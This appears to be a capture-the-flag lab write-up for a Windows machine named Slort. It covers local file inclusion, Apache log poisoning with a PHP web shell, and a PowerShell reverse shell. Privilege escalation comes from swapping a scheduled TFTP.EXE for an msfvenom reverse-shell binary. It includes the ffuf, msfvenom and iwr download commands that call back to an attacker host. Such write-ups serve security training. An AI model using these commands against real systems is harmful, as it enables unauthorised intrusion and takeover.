Slort

Target IP: 192.168.197.53

For this machine, enumeration is key.


Reconnaissance

53c2b2fabfe758986abbec5111c4a386.png
There are plenty of TCP ports open on the target machine, as shown above.

2bfdd40b54a867c3093fc50f00118a32.png
Performing an aggressive nmap shows the result above. The web application on port 8080 seems interesting.


Enumeration

Port 8080: HTTP
5f7e7d90230dde76c589acafffc6ca0e.png
The webpage above is shown for this application. This is the default webpage of the XAMPP installation.

1e1e51b808c2c98afa9d157ea3c9e0ff.png
However, browsing to http://192.168.197.53:8080/site/index.php?page=main.php displays the webpage above. The URL is interesting as the parameter page is appended and the web application loads the passed argument. Maybe I can perform LFI/RFI using this parameter?

744752818ef05eef051f1a107ccecdbe.png
After some enumeration, I found the parameter page can be used for LFI. I used ffuf with the command ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u http://192.168.197.53:8080/site/index.php?page=FUZZ -fs 344 | grep "access.log" to find any log files that I could poison, as shown above.

960874bf2959a1abd99e0c9add99c7df.png
I successfully found c:/xampp/apache/logs/access.log is accessible, as shown above; therefore, I can poison it!


Exploitation

3ea172fd2fff19b42cc56b05adf2639b.png
I made a request to the web application and intercepted it using Burpsuite. Then I inserted and deployed my PHP web shell payload at User-Agent header. This was successful as the log file was poisoned. I could perform RCE using it. Time to obtain a reverse shell connection!

c0800ae700ff9c6db995c03dfa465c6a.png
Since the target machine is a Windows machine. I used a base64 encoded Powershell reverse shell script. To make sure the payload is valid, I encoded all spaces with %20. Then using the poisoned log file, I deployed my reverse shell script.

f77339bfe82f5883e68167fa2050acd9.png
And I got a hit! I successfully got a reverse shell connection on my machine at port 8443 with the session as rupert.


Privilege Escalation

1e6aa587be01a0c2dffcab8a20fff0b7.png
There is a Backup directory. Using icacls, I can see the current user has full access over this directory.

a8c690ef8a357aeab393ee9d554b4421.png
The binary TFTP.EXE is executed every five minutes according to the info.txt file.

249c9c1cf32a75073a4d9d7b179f1a06.png
And I can replace this TFTP.EXE binary with a malicious one as I have Full access.

7e4e6217842d4f47bdb985a47dcc1ff6.png
Using the command msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=8443 -f exe -o TFTP.EXE --platform windows, I generated a malicious reverse shell executable file that connects to my machine on port 8443.

7515ba412db7f904c00579b91f73586e.png
On the target machine, I used the command iwr -Uri http://192.168.45.228/TFTP.EXE -Outfile TFTP.EXE to download this malicious file. I made sure to rename the original TFTP.EXE as TFTP.EXE.bak just in case if something goes wrong.

59974cade8a8a33c7adfcb594546e04f.png
After waiting for some time, I finally got a reverse shell connection on my machine at port 8443. Now I have a shell session as the user administrator. GG.


Flags

8b6a7696922778f842290c9ae90265bf.png
The local.txt flag is shown above. It is located at Desktop of user rupert.

06c60a055cfb386487efcbef8a159606.png
The proof.txt flag after replacing the TFTP.EXE with my reverse shell executable file to gain a shell with a session as the user administrator. This flag is located at Desktop of user administrator.